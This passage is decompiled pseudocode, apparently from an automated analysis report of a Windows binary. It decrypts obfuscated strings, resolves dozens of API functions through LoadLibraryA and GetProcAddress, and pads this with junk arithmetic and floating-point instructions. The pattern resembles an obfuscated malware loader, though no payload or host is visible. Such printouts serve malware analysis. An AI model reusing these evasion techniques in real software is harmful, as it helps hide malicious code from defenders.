				_t1094 =  *0xfae194; // 0x4daf5891
				_t933 =  *0xfae310; // 0x604307b9
				_t1095 =  *0xfafc6c; // 0x74ca0000
				 *0xfae310 = _t933 * (( *0xfae008 & 0x0000ffff) - _t1094);
				 *0xfb043c = GetProcAddress(_t1095, _t416);
				_t421 = E00F6CF90(_t1516, _t1582, 0x302c, 0xa);
				E00F76570(0xf, _t416);
				_t423 =  *0xfafc6c; // 0x74ca0000
				_t424 = GetProcAddress(_t423, _t421);
				_t935 =  *0xfae34c; // 0x80000000
				 *0xfb02a8 = _t424;
				 *0xfae34c = _t935 * 0xd92507c6;
				_t1308 = E00F6CF90(_t1516, _t1582, 0x39c9, 0xd);
				_v8 = ( *0xfae598 & 0x0000ffff) + ( *0xfae2d8 & 0x0000ffff) + 0x51384b83;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1582;
				_t1584 =  *0xfae324 * _v12;
				 *0xfae324 = _t1584;
				 *0xfae2d8 =  *0xfae2d8 + 1;
				E00F76570(0xa, _t421);
				_t938 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0444 = GetProcAddress(_t938, _t1308);
				_t430 = E00F6CF90(_t1516, _t1584, 0x22a5, 0xd);
				E00F76570(0xd, _t1308);
				_v8 =  *0xfae04c & 0x0000ffff;
				_t1309 = _t1308 | 0xffffffff;
				asm("fild dword [ebp-0x4]");
				 *0xfae0b0 = _t1584;
				 *0xfae04c =  *0xfae04c + _t1309;
				_t939 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc8c = GetProcAddress(_t939, _t430);
				 *0xfae0e8 =  *0xfae0e8 + _t1309;
				_t1099 =  *0xfae0e8; // 0x80000000
				_v8 = _t1099;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				_t434 = E00F6CF90(_t1516,  *0xfae148, 0x3818, 0x11);
				E00F76570(0xd, _t430);
				_t436 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc58 = GetProcAddress(_t436, _t434);
				_t438 = E00F6CF90(_t1516,  *0xfae148, 0x32ce, 0x11);
				E00F76570(0x11, _t434);
				_t940 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0290 = GetProcAddress(_t940, _t438);
				_t441 = E00F6CF90(_t1516,  *0xfae148, 0x11b, 0x13);
				E00F76570(0x11, _t438);
				_t1100 =  *0xfafc6c; // 0x74ca0000
				 *0xfb02ac = GetProcAddress(_t1100, _t441);
				_t444 = E00F6CF90(_t1516,  *0xfae148, 0x2ab6, 0xe);
				 *0xfae200 =  *0xfae200 +  *0xfa75c8;
				_v12 =  *0xfae200 +  *0xfa82f8;
				 *0xfae0e4 = E00F7CABC();
				E00F76570(0x13, _t441);
				_t447 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0514 = GetProcAddress(_t447, _t444);
				_t449 = E00F6CF90(_t1516,  *0xfae120 + _v12, 0x1df6, 0xd);
				E00F76570(0xe, _t444);
				_t941 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc44 = GetProcAddress(_t941, _t449);
				_t452 = E00F6CF90(_t1516,  *0xfae120 + _v12, 0x3fad, 0xa);
				E00F76570(0xd, _t449);
				_t1101 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc54 = GetProcAddress(_t1101, _t452);
				_t1594 =  *0xfae2a0 -  *0xfa82f4 -  *0xfa82f0;
				 *0xfae2c4 = E00F7CABC();
				_t456 = E00F6CF90(_t1516, _t1594, 0x31b0, 0xc);
				E00F76570(0xa, _t452);
				_t458 =  *0xfafc6c; // 0x74ca0000
				 *0xfb02b4 = GetProcAddress(_t458, _t456);
				_t460 = E00F6CF90(_t1516, _t1594, 0x39d8, 0x11);
				E00F76570(0xc, _t456);
				_t942 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc40 = GetProcAddress(_t942, _t460);
				_t463 = E00F6CF90(_t1516, _t1594, 0x162f, 0x10);
				_t1314 = _t463;
				E00F76570(0x11, _t460);
				_t1102 =  *0xfafc6c; // 0x74ca0000
				_t1403 = _t1378 + 0x190;
				 *0xfb02f4 = GetProcAddress(_t1102, _t463);
				_t466 =  *0xfae3ec; // 0x94572d35
				_v8 = _t466;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1594;
				_t1597 =  *0xfae480 + _v12 -  *0xfa82e8;
				_t943 =  *0xfae288; // 0xec5403bf
				_v28 = _t1597;
				_v8 = _t943;
				asm("fild dword [ebp-0x4]");
				_v12 = _t1597;
				_t1599 =  *0xfae480 + _v12;
				asm("fcomp qword [ebp-0x18]");
				asm("fnstsw ax");
				_t1517 = _t466 & 0x00000001;
				if((_t466 & 0x00000001) == 0) {
					 *0xfae34c = 0xd2989f46;
				}
				_t467 = E00F6CF90(_t1517, _t1599, 0x131b, 0xb);
				E00F76570(0x10, _t1314);
				_t1103 =  *0xfafc6c; // 0x74ca0000
				 *0xfb042c = GetProcAddress(_t1103, _t467);
				_t470 = E00F6CF90(_t1517, _t1599, 0xec, 0xd);
				 *0xfae608 = ( *0xfae608 & 0x0000ffff) - 0x38b78fc3;
				E00F76570(0xb, _t467);
				_t944 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc48 = GetProcAddress(_t944, _t470);
				_t475 = E00F6CF90(_t1517, _t1599, 0x18a, 0xb);
				E00F76570(0xd, _t470);
				_t1104 =  *0xfafc6c; // 0x74ca0000
				 *0xfb044c = GetProcAddress(_t1104, _t475);
				_t478 = E00F6CF90(_t1517, _t1599, 0x3ae, 0xc);
				E00F76570(0xb, _t475);
				_t480 =  *0xfafc6c; // 0x74ca0000
				 *0xfb02a4 = GetProcAddress(_t480, _t478);
				_t482 = E00F6CF90(_t1517, _t1599, 0x2347, 0x13);
				E00F76570(0xc, _t478);
				_t945 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc4c = GetProcAddress(_t945, _t482);
				_t485 = E00F6CF90(_t1517, _t1599, 0x2ae2, 0xe);
				E00F76570(0x13, _t482);
				_t1105 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0484 = GetProcAddress(_t1105, _t485);
				_t488 = E00F6CF90(_t1517, _t1599, 0x231b, 7);
				E00F76570(0xe, _t485);
				_t490 =  *0xfafc6c; // 0x74ca0000
				 *0xfb028c = GetProcAddress(_t490, _t488);
				_t492 = E00F6CF90(_t1517, _t1599, 0x33b, 9);
				E00F76570(7, _t488);
				_t946 =  *0xfafc6c; // 0x74ca0000
				 *0xfb02a0 = GetProcAddress(_t946, _t492);
				_t1227 = E00F6CF90(_t1517, _t1599, 0x1d5f, 0x10);
				_v8 = _t1227;
				E00F76570(9, _t492);
				_t1106 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc78 = GetProcAddress(_t1106, _t1227);
				_t1228 = E00F6CF90(_t1517, _t1599, 0x3655, 0xd);
				_t500 = E00F76570(0x10, _v8);
				_t1413 = _t1403 + 0xa0;
				asm("fcompp");
				asm("fnstsw ax");
				_t1604 =  *0xfae0a0;
				asm("fld1");
				asm("faddp st1, st0");
				_t1518 = _t500 & 0x00000001;
				if((_t500 & 0x00000001) == 0) {
					_v28 =  *0xfae5e8 +  *0xfa82d0;
					_t1604 =  *0xfae4c8 + _v28;
					 *0xfae4c8 =  *0xfae4c8 + _v28;
				}
				_t947 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0760 = GetProcAddress(_t947, _t1228);
				_t502 = E00F6CF90(_t1518, _t1604, 0xd08, 0x18);
				E00F76570(0xd, _t1228);
				_t1107 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0314 = GetProcAddress(_t1107, _t502);
				_v28 =  *0xfae548 +  *0xfa82c8 +  *0xfa82c0;
				 *0xfae270 =  *0xfae270 + _v28;
				 *0xfae548 =  *0xfae548 +  *0xfa75c8;
				_t505 = E00F6CF90(_t1518,  *0xfae548 +  *0xfa75c8, 0xf8b, 0xb);
				E00F76570(0x18, _t502);
				_t507 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc30 = GetProcAddress(_t507, _t505);
				_t509 = E00F6CF90(_t1518,  *0xfae548 +  *0xfa75c8, 0x12f1, 0x11);
				E00F76570(0xb, _t505);
				_t948 =  *0xfafc6c; // 0x74ca0000
				_t511 = GetProcAddress(_t948, _t509);
				_t1612 =  *0xfae044;
				_t1108 =  *0xfae588; // 0xb5d5
				_v20 = _t1612;
				 *0xfb0270 = _t511;
				_v8 = _t1108;
				asm("fild dword [ebp-0x4]");
				_v28 = _t1612;
				_t1614 =  *0xfae538 + _v28;
				asm("fsubr qword [ebp-0x10]");
				 *0xfae044 = _t1614;
				_t513 = E00F6CF90(_t1518, _t1614, 0x37b7, 0x11);
				E00F76570(0x11, _t509);
				_t949 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0488 = GetProcAddress(_t949, _t513);
				_t516 = E00F6CF90(_t1518, _t1614, 0x3e1a, 0x12);
				E00F76570(0x11, _t513);
				_t1109 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0274 = GetProcAddress(_t1109, _t516);
				_t519 = E00F6CF90(_t1518, _t1614, 0x1304, 0x15);
				E00F76570(0x12, _t516);
				_t521 =  *0xfafc6c; // 0x74ca0000
				 *0xfb04d8 = GetProcAddress(_t521, _t519);
				_t523 = E00F6CF90(_t1518, _t1614, 0xe27, 0xb);
				E00F76570(0x15, _t519);
				_t1110 =  *0xfafc6c; // 0x74ca0000
				 *0xfae028 = ( *0xfae028 & 0x0000ffff) - 0x124f00c4;
				 *0xfafc98 = GetProcAddress(_t1110, _t523);
				_t526 = E00F6CF90(_t1518, _t1614, 0x2ca2, 0x12);
				E00F76570(0xb, _t523);
				_t528 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc80 = GetProcAddress(_t528, _t526);
				_t530 = E00F6CF90(_t1518, _t1614, 0xf37, 0x1d);
				E00F76570(0x12, _t526);
				_t952 =  *0xfafc6c; // 0x74ca0000
				 *0xfafc50 = GetProcAddress(_t952, _t530);
				_t533 = E00F6CF90(_t1518, _t1614, 0x37a, 0x15);
				E00F76570(0x1d, _t530);
				_t1111 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0754 = GetProcAddress(_t1111, _t533);
				_t536 = E00F6CF90(_t1518, _t1614, 0xfb, 0xb);
				E00F76570(0x15, _t533);
				_t538 =  *0xfafc6c; // 0x74ca0000
				 *0xfb04d4 = GetProcAddress(_t538, _t536);
				_t540 = E00F6CF90(_t1518, _t1614, 0x21d, 0x11);
				E00F76570(0xb, _t536);
				_t953 =  *0xfafc6c; // 0x74ca0000
				 *0xfb0498 = GetProcAddress(_t953, _t540);
				_t543 = E00F6CF90(_t1518, _t1614, 0x3df6, 0xb);
				E00F76570(0x11, _t540);
				_t545 = LoadLibraryA(_t543); // executed
				 *0xfb048c = _t545;
				E00F76570(0xb, _t543);
				_t1427 = _t1413 + 0xd8;
				_t1519 =  *0xfb048c;
				if( *0xfb048c == 0) {
					_t898 = E00F6CF90(_t1519, _t1614, 0x39eb, 0xc);
					_t1202 =  *0xfae5d0; // 0x2b98
					_v8 = _t1202;
					asm("fild dword [ebp-0x4]");
					_v8 = _t1614;
					 *0xfae5d0 = E00F7CABC();
					_t901 = LoadLibraryA(_t898);
					_t1614 =  *0xfae448;
					_t1074 =  *0xfae38c; // 0x93fc1fed
					_v20 =  *0xfae448;
					_v8 = _t1074;
					asm("fild dword [ebp-0x4]");
					 *0xfb048c = _t901;
					asm("fsubr qword [ebp-0x10]");
					 *0xfae284 = E00F7CABC();
					 *0xfae38c =  *0xfae38c - 1;
					_t1520 =  *0xfae38c;
					E00F76570(0xc, _t898);
					_t1427 = _t1427 + 0x10;
				}
				_t547 = E00F6CF90(_t1520, _t1614, 0xef6, 0xb);
				_t1112 =  *0xfb048c; // 0x74160000
				 *0xfb074c = GetProcAddress(_t1112, _t547);
				_t549 = E00F6CF90(_t1520, _t1614, 0x382b, 0xb);
				 *0xfae478 =  *0xfae478 + 0x5b34efd0;
				E00F76570(0xb, _t547);
				_t551 =  *0xfb048c; // 0x74160000
				 *0xfb02e8 = GetProcAddress(_t551, _t549);
				_t553 = E00F6CF90(_t1520, _t1614, 0xf5b, 0xd);
				E00F76570(0xb, _t549);
				_t954 =  *0xfb048c; // 0x74160000
				 *0xfb0748 = GetProcAddress(_t954, _t553);
				_t556 = E00F6CF90(_t1520, _t1614, 0x2998, 7);
				E00F76570(0xd, _t553);
				_t1113 =  *0xfb048c; // 0x74160000
				 *0xfafc70 = GetProcAddress(_t1113, _t556);
				_t559 = E00F6CF90(_t1520, _t1614, 0x39c2, 5);
				E00F76570(7, _t556);
				_t561 =  *0xfb048c; // 0x74160000
				 *0xfb0480 = GetProcAddress(_t561, _t559);
				_t1237 = E00F6CF90(_t1520, _t1614, 0xe34, 0xc);
				_v8 = _t1237;
				E00F76570(5, _t559);
				_t955 =  *0xfb048c; // 0x74160000
				_t565 = GetProcAddress(_t955, _t1237);
				_t1616 =  *0xfae058 -  *0xfa82b8;
				 *0xfb04f0 = _t565;
				 *0xfae058 = _t1616;
				_t1238 = E00F6CF90(_t1520, _t1616, 0x391, 8);
				E00F76570(0xc, _v8);
				_t568 =  *0xfae12c; // 0xd1b0ed04
				_t569 = _t568 - 0x7a999724;
				_v8 = _t569;
				asm("fild dword [ebp-0x4]");
				_t1434 = _t1427 + 0x68;
				_v20 = _t1616;
				_t1617 =  *0xfae3e0;
				_t956 =  *0xfae318; // 0x8b0a
				_v8 = _t956;
				 *0xfae318 =  *0xfae318 + 1;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				asm("fcomp qword [ebp-0x10]");
				asm("fnstsw ax");
				_t1521 = 0x00000001 & _t569;
				if((0x00000001 & _t569) != 0) {
					 *0xfae24c =  *0xfae24c + 1;
					_t1116 =  *0xfae24c; // 0x97715537
					_v8 = _t1116 + 0x6eeb6c2b;
					_v20 =  *0xfae540 +  *0xfa82b0;
					asm("fild dword [ebp-0x4]");
					asm("fcomp qword [ebp-0x10]");
					asm("fnstsw ax");
					_t1617 =  *0xfae540;
					asm("fld1");
					asm("faddp st1, st0");
					 *0xfae540 = _t1617;
					__eflags = _t569 & 0x00000005;
					if(__eflags == 0) {
						 *0xfae0b8 =  *0xfae0b8 + 1;
						_t894 =  *0xfae0b8; // 0xf45e
						_t1073 =  *0xfae320; // 0x1689
						_t1201 = _t1073 - _t894 + 0x35052b0a;
						__eflags = _t1201;
						_v8 = _t1201;
						asm("fild dword [ebp-0x4]");
						 *0xfae3f0 = _t1617;
					}
				} else {
					 *0xfae284 = ( *0xfae284 & 0x0000ffff) - 0x9c88f13;
				}
				_t570 =  *0xfb048c; // 0x74160000
				 *0xfb0440 = GetProcAddress(_t570, _t1238);
				 *0xfae34c =  *0xfae34c - 1;
				_t958 =  *0xfae34c; // 0x80000000
				_v8 = 0xdae5289e - _t958;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1617;
				_v20 =  *0xfae488 + _v20;
				 *0xfae464 =  *0xfae464 * _v20;
				asm("fld1");
				asm("faddp st1, st0");
				_t572 = E00F6CF90(_t1521,  *0xfae488, 0xf7b, 0xe);
				E00F76570(8, _t1238);
				_t574 =  *0xfb048c; // 0x74160000
				 *0xfafb08 = GetProcAddress(_t574, _t572);
				_t576 = E00F6CF90(_t1521,  *0xfae488, 0x1597, 6);
				_t959 =  *0xfae378; // 0x1dce92e
				 *0xfae378 = _t959 * 0xd693be;
				E00F76570(0xe, _t572);
				_v20 =  *0xfae064;
				asm("fsubr qword [0xfa82a8]");
				asm("fsubr qword [ebp-0x10]");
				 *0xfae064 =  *0xfae358;
				_t1120 =  *0xfb048c; // 0x74160000
				 *0xfae358 =  *0xfae358 +  *0xfa75c8;
				 *0xfb046c = GetProcAddress(_t1120, _t576);
				_t579 = E00F6CF90(_t1521,  *0xfae358 +  *0xfa75c8, 0x1d71, 0xa);
				 *0xfae598 = ( *0xfae598 & 0x0000ffff) + 0x6ed171b8;
				E00F76570(6, _t576);
				_t961 =  *0xfb048c; // 0x74160000
				 *0xfafb0c = GetProcAddress(_t961, _t579);
				_t584 = E00F6CF90(_t1521,  *0xfae358 +  *0xfa75c8, 0x1e27, 0xa);
				E00F76570(0xa, _t579);
				_t1121 =  *0xfb048c; // 0x74160000
				_t586 = GetProcAddress(_t1121, _t584);
				_t1630 =  *0xfae3f0 -  *0xfa82a0;
				 *0xfb029c = _t586;
				 *0xfae3f0 = _t1630;
				_t587 = E00F6CF90(_t1521, _t1630, 0x12e8, 7);
				E00F76570(0xa, _t584);
				_t589 =  *0xfb048c; // 0x74160000
				 *0xfb0300 = GetProcAddress(_t589, _t587);
				_t591 = E00F6CF90(_t1521, _t1630, 0xe9b, 5);
				_t962 =  *0xfae284; // 0xdd06
				_v8 = _t962;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1630;
				_t592 =  *0xfae208; // 0x5884a3d
				asm("fsubr qword [ebp-0x10]");
				_v8 = _t592;
				_v20 =  *0xfae228 -  *0xfa8298;
				asm("fild dword [ebp-0x4]");
				 *0xfae208 = E00F7CABC();
				 *0xfae228 =  *0xfae228 -  *0xfa75c8;
				 *0xfae284 =  *0xfae284 - 1;
				E00F76570(7, _t587);
				_t963 =  *0xfb048c; // 0x74160000
				 *0xfb0460 = GetProcAddress(_t963, _t591);
				_t596 = E00F6CF90(_t1521,  *0xfae228 -  *0xfa75c8, 0x2aad, 7);
				E00F76570(5, _t591);
				_t1123 =  *0xfb048c; // 0x74160000
				 *0xfb02fc = GetProcAddress(_t1123, _t596);
				_t599 = E00F6CF90(_t1521,  *0xfae228 -  *0xfa75c8, 0xbd5, 5);
				E00F76570(7, _t596);
				_t601 =  *0xfb048c; // 0x74160000
				 *0xfb0490 = GetProcAddress(_t601, _t599);
				_t603 = E00F6CF90(_t1521,  *0xfae228 -  *0xfa75c8, 0xe42, 0xb);
				E00F76570(5, _t599);
				_t964 =  *0xfb048c; // 0x74160000
				 *0xfb0470 = GetProcAddress(_t964, _t603);
				_t606 = E00F6CF90(_t1521,  *0xfae228 -  *0xfa75c8, 0x2c83, 7);
				_t1243 = _t606;
				E00F76570(0xb, _t603);
				_t1637 =  *0xfae2a4 *  *0xfa8294;
				_t1124 =  *0xfb048c; // 0x74160000
				 *0xfae2a4 = _t1637;
				 *0xfb0434 = GetProcAddress(_t1124, _t606);
				_t1334 = E00F6CF90(_t1521, _t1637, 0x23d4, 0xd);
				_t610 =  *0xfae298 & 0x0000ffff;
				_v8 = _t610 + 0x560a8809;
				_t1445 = _t1434 + 0xa8;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1637;
				_t1125 =  *0xfae144; // 0xca10ec72
				 *0xfae144 =  *0xfae144 + 1;
				_v8 = _t1125;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				asm("fucompp");
				asm("fnstsw ax");
				_t1641 =  *0xfae510 +  *0xfa75c8;
				 *0xfae510 = _t1641;
				_t1522 = _t610 & 0x00000044;
				if((_t610 & 0x00000044) != 0) {
					_v20 =  *0xfae348 +  *0xfa8290 -  *0xfa828c;
					_t1641 = _v20;
					asm("fucompp");
					asm("fnstsw ax");
					__eflags = _t610 & 0x00000044;
					if((_t610 & 0x00000044) == 0) {
						st0 =  *0xfae1d8;
						_t1641 =  *0xfae278;
						st0 = _t1641;
					}
				} else {
					 *0xfae558 = ( *0xfae318 & 0x0000ffff) - 0x6a11dab7;
				}
				E00F76570(7, _t1243);
				_t612 = LoadLibraryA(_t1334);
				_t1126 =  *0xfae2dc; // 0x14e81cf5
				_v8 = _t1126;
				asm("fild dword [ebp-0x4]");
				 *0xfb0310 = _t612;
				 *0xfae110 = _t1641;
				_t613 = E00F6CF90(_t1522, _t1641, 0xeb9, 0x14);
				E00F76570(0xd, _t1334);
				_t615 =  *0xfb0310; // 0x76a00000
				 *0xfb0508 = GetProcAddress(_t615, _t613);
				 *0xfae33c =  *0xfae33c + 1;
				_t967 =  *0xfae33c; // 0xc716
				 *0xfae298 = ( *0xfae298 & 0x0000ffff) - _t967 + 0x196f2073;
				_t618 = E00F6CF90(_t1522, _t1641, 0x1e18, 0xd);
				E00F76570(0x14, _t613);
				 *0xfae460 =  *0xfae460 + 0x24af4e0a;
				_t620 =  *0xfb0310; // 0x76a00000
				 *0xfb04bc = GetProcAddress(_t620, _t618);
				_t622 = E00F6CF90(_t1522, _t1641, 0x319f, 0xf);
				_t1245 = _t622;
				E00F76570(0xd, _t618);
				_t968 =  *0xfb0310; // 0x76a00000
				 *0xfb04dc = GetProcAddress(_t968, _t622);
				_t625 = E00F6CF90(_t1522, _t1641, 0xdff, 0x13);
				asm("fld1");
				_t1336 = _t625;
				_t1450 = _t1445 + 0x40;
				asm("faddp st2, st0");
				asm("fxch st0, st1");
				 *0xfae1d4 = st0;
				_v20 =  *0xfae1d4;
				asm("fcompp");
				asm("fnstsw ax");
				_t1654 =  *0xfae5e4 - st1;
				 *0xfae5e4 = _t1654;
				_t1523 = _t625 & 0x00000005;
				if((_t625 & 0x00000005) != 0) {
					asm("fsubr dword [0xfae4f8]");
					 *0xfae4f8 = _t1654;
					_t1657 =  *0xfae4f8 -  *0xfa8280;
					asm("fsubp st1, st0");
					 *0xfae0d0 =  *0xfae4f8 -  *0xfa8280;
				} else {
					 *0xfae59c =  *0xfae59c + 1;
					st0 = _t1654;
					st0 =  *0xfae450;
					_t1657 =  *0xfae15c;
					st0 =  *0xfae15c;
				}
				E00F76570(0xf, _t1245);
				_t627 =  *0xfb0310; // 0x76a00000
				 *0xfb0294 = GetProcAddress(_t627, _t1336);
				_t629 = E00F6CF90(_t1523, _t1657, 0x2292, 0x11);
				E00F76570(0x13, _t1336);
				_t969 =  *0xfb0310; // 0x76a00000
				 *0xfb04a8 = GetProcAddress(_t969, _t629);
				_t632 = E00F6CF90(_t1523, _t1657, 0x3ebf, 0x1c);
				_t1337 = _t632;
				E00F76570(0x11, _t629);
				_t1130 =  *0xfb0310; // 0x76a00000
				 *0xfb04f4 = GetProcAddress(_t1130, _t632);
				 *0xfae270 =  *0xfae270 -  *0xfa75c8;
				_t635 =  *0xfae270; // 0x1918a56b
				_t970 =  *0xfae274; // 0x435cdee1
				_v20 =  *0xfae43c;
				_v12 = _t635;
				_v8 = _t970;
				asm("fsubr qword [ebp-0x10]");
				 *0xfae43c =  *0xfae2a0 + _v12 +  *0xfa8278;
				asm("fld1");
				asm("fsubp st1, st0");
				_t1247 = E00F6CF90(_t1523,  *0xfae2a0, 0x1003, 0x1c);
				asm("fld1");
				_t1454 = _t1450 + 0x30;
				_t1666 =  *0xfae450 - st0;
				asm("fxch st0, st1");
				 *0xfae450 = _t1666;
				_t1131 =  *0xfae288; // 0xec5403bf
				_v8 = _t1131;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1666;
				_t1667 =  *0xfae1f0;
				_t637 =  *0xfae4a8; // 0x0
				asm("fsubr qword [ebp-0x10]");
				_v8 = _t637;
				_v28 = _t1667;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1667;
				 *0xfae4a8 =  *0xfae4a8 + 1;
				asm("fsubr qword [ebp-0x10]");
				asm("fcomp qword [ebp-0x18]");
				asm("fnstsw ax");
				_t1670 =  *0xfae1f0 + st1;
				 *0xfae1f0 = _t1670;
				if((_t637 & 0x00000041) != 0) {
					st0 = _t1670;
				} else {
					asm("fsubr qword [0xfae198]");
					 *0xfae198 = _t1670;
					_t1197 =  *0xfae1d0; // 0x2f751c98
					asm("fsubr qword [0xfa8270]");
					_v8 = _t1197;
					_v20 =  *0xfae198;
					asm("fild dword [ebp-0x4]");
					 *0xfae1d0 = E00F7CABC();
				}
				E00F76570(0x1c, _t1337);
				 *0xfae0b8 =  *0xfae0b8 - 1;
				_t1671 =  *0xfae3bc;
				_t639 =  *0xfae0b8; // 0xf45e
				_v20 = _t1671;
				_t1132 =  *0xfae288; // 0xec5403bf
				_v8 = _t639;
				_t1455 = _t1454 + 8;
				asm("fild dword [ebp-0x4]");
				_v8 = _t1132;
				_t1673 = _t1671 + _v20 -  *0xfa8268;
				_v20 = _t1673;
				asm("fild dword [ebp-0x4]");
				asm("fcomp qword [ebp-0x10]");
				asm("fnstsw ax");
				_t1525 = _t639 & 0x00000005;
				if((_t639 & 0x00000005) == 0) {
					_t1673 =  *0xfae3a0 -  *0xfa8260;
					 *0xfae3a0 = _t1673;
				}
				_t640 =  *0xfb0310; // 0x76a00000
				 *0xfb0280 = GetProcAddress(_t640, _t1247);
				_t642 = E00F6CF90(_t1525, _t1673, 0xb8, 0xf);
				E00F76570(0x1c, _t1247);
				_t973 =  *0xfb0310; // 0x76a00000
				 *0xfb0750 = GetProcAddress(_t973, _t642);
				_t645 = E00F6CF90(_t1525, _t1673, 0x1a31, 0x16);
				E00F76570(0xf, _t642);
				_t1133 =  *0xfb0310; // 0x76a00000
				 *0xfb04e0 = GetProcAddress(_t1133, _t645);
				_t648 = E00F6CF90(_t1525, _t1673, 0x145, 0xe);
				_t649 =  *0xfae58c; // 0x81dce92e
				_v8 = 0x1ab700d7 - _t649;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1673;
				 *0xfae170 =  *0xfae170 + _v20;
				 *0xfae58c =  *0xfae58c - 1;
				E00F76570(0x16, _t645);
				_t1134 =  *0xfb0310; // 0x76a00000
				 *0xfb04b4 = GetProcAddress(_t1134, _t648);
				_t652 = E00F6CF90(_t1525,  *0xfae170 + _v20, 0xf6a, 0xf);
				E00F76570(0xe, _t648);
				_t654 =  *0xfb0310; // 0x76a00000
				 *0xfafc94 = GetProcAddress(_t654, _t652);
				_t656 = E00F6CF90(_t1525,  *0xfae170 + _v20, 0xe4f, 0xe);
				_t1340 = _t656;
				E00F76570(0xf, _t652);
				_t976 =  *0xfb0310; // 0x76a00000
				_t1460 = _t1455 + 0x50;
				_t658 = GetProcAddress(_t976, _t656);
				 *0xfafb10 = _t658;
				_t1677 =  *0xfa8258 -  *0xfae444;
				_t1135 =  *0xfae3d0; // 0x399d3e11
				_v8 = _t1135;
				_v20 = _t1677;
				asm("fild dword [ebp-0x4]");
				asm("fsubr qword [ebp-0x10]");
				_v20 = _t1677;
				asm("fsubr qword [0xfa8250]");
				asm("fcomp qword [ebp-0x10]");
				asm("fnstsw ax");
				_t1680 =  *0xfae220 +  *0xfa75c8;
				 *0xfae220 = _t1680;
				 *0xfae3d0 =  *0xfae3d0 + 1;
				_t1526 = _t658 & 0x00000005;
				if((_t658 & 0x00000005) == 0) {
					_t889 =  *0xfae0bc; // 0xdec
					_v8 = _t889;
					asm("fild dword [ebp-0x4]");
					_v28 = _t1680;
					_v20 =  *0xfae0b0 -  *0xfa8248;
					asm("fsubr qword [ebp-0x18]");
					 *0xfae0bc = E00F7CABC();
					_t1680 =  *0xfae0b0;
					asm("fld1");
					asm("faddp st1, st0");
					 *0xfae0b0 = _t1680;
				}
				_t659 = E00F6CF90(_t1526, _t1680, 0x1328, 0xe);
				_t1136 =  *0xfae040; // 0xe6acfb4
				_v8 = _t1136 - 0x25a37e67;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1680;
				_t1682 =  *0xfae5c8 + _v20;
				 *0xfae5c8 = _t1682;
				E00F76570(0xe, _t1340);
				_t661 =  *0xfb0310; // 0x76a00000
				 *0xfb0304 = GetProcAddress(_t661, _t659);
				_t663 = E00F6CF90(_t1526, _t1682, 0xfd4, 0xf);
				E00F76570(0xe, _t659);
				_t977 =  *0xfb0310; // 0x76a00000
				 *0xfb0474 = GetProcAddress(_t977, _t663);
				_t666 = E00F6CF90(_t1526, _t1682, 0x14ec, 0xe);
				E00F76570(0xf, _t663);
				_t1138 =  *0xfb0310; // 0x76a00000
				 *0xfb0510 = GetProcAddress(_t1138, _t666);
				_t669 = E00F6CF90(_t1526, _t1682, 0x3c0, 0x11);
				E00F76570(0xe, _t666);
				_t671 =  *0xfb0310; // 0x76a00000
				 *0xfb0454 = GetProcAddress(_t671, _t669);
				_t1252 = E00F6CF90(_t1526, _t1682, 0x223b, 0xc);
				E00F76570(0x11, _t669);
				_t978 =  *0xfae2ec; // 0x76d570f4
				_t1465 = _t1460 + 0x50;
				if(_t978 <= 0x6c5b8536) {
					_t1195 =  *0xfae588; // 0xb5d5
					_t1068 =  *0xfae5b4; // 0x1cd4719a
					 *0xfae5b4 =  *0xfae5b4 - 1;
					_t1528 = _t1195 + 0x6ba0011b - _t1068 - 0x4da818f6;
					if(_t1195 + 0x6ba0011b <= _t1068 - 0x4da818f6) {
						_t1196 =  *0xfae128; // 0x2069
						_v8 = _t1196;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1682;
						_t1070 =  *0xfae378; // 0x1dce92e
						_v8 = _t1070;
						_v20 =  *0xfae490 + _v20 +  *0xfa8240;
						asm("fild dword [ebp-0x4]");
						 *0xfae378 = E00F7CABC();
						_t1682 =  *0xfae490 -  *0xfa75c8;
						 *0xfae490 = _t1682;
					}
				}
				_t1139 =  *0xfb0310; // 0x76a00000
				 *0xfb0324 = GetProcAddress(_t1139, _t1252);
				_t676 = E00F6CF90(_t1528, _t1682, 0xfc6, 0xc);
				E00F76570(0xc, _t1252);
				_t678 =  *0xfb0310; // 0x76a00000
				 *0xfb02d8 = GetProcAddress(_t678, _t676);
				 *0xfae020 = 0x2462;
				_t680 = E00F6CF90(_t1528, _t1682, 0x3edd, 0x19);
				E00F76570(0xc, _t676);
				_t1140 =  *0xfb0310; // 0x76a00000
				 *0xfb0504 = GetProcAddress(_t1140, _t680);
				_t683 = E00F6CF90(_t1528, _t1682, 0x3188, 0x15);
				E00F76570(0x19, _t680);
				_t685 =  *0xfb0310; // 0x76a00000
				 *0xfb02ec = GetProcAddress(_t685, _t683);
				_t687 = E00F6CF90(_t1528, _t1682, 0x14e2, 8);
				E00F76570(0x15, _t683);
				_t980 =  *0xfb0310; // 0x76a00000
